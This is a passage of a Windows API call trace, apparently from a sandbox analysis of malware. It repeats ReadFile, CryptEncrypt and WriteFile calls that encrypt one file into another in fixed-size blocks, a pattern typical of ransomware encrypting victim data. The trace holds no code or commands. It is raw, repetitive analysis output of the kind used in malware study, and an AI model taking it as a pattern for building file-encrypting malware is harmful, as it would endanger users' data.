lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.149] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.149] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.149] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.149] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.149] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.149] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.149] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.149] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.149] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.149] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.149] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.150] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.150] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.150] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.150] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.150] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.150] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.150] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.150] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.150] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.150] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.150] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.150] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.150] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.150] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.151] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.151] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.151] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.151] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.151] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.151] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.151] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.151] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.151] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.151] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.151] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.151] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.151] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.151] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.152] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.152] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.152] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.152] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.152] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.152] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.152] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.152] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.152] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.152] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.152] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.152] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.152] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.152] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.153] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.153] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.153] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.153] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.153] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.153] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.153] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.153] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.153] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.153] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.153] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.153] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.153] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.153] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.153] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.154] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.154] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.154] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.154] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.154] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.154] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.154] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.154] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.154] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.154] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.154] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.154] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.154] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.154] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.154] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.155] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.155] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.155] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.155] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.155] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.155] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.155] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.155] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.155] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.155] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.155] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.155] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.156] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.156] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.156] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.156] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.156] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.156] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.156] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 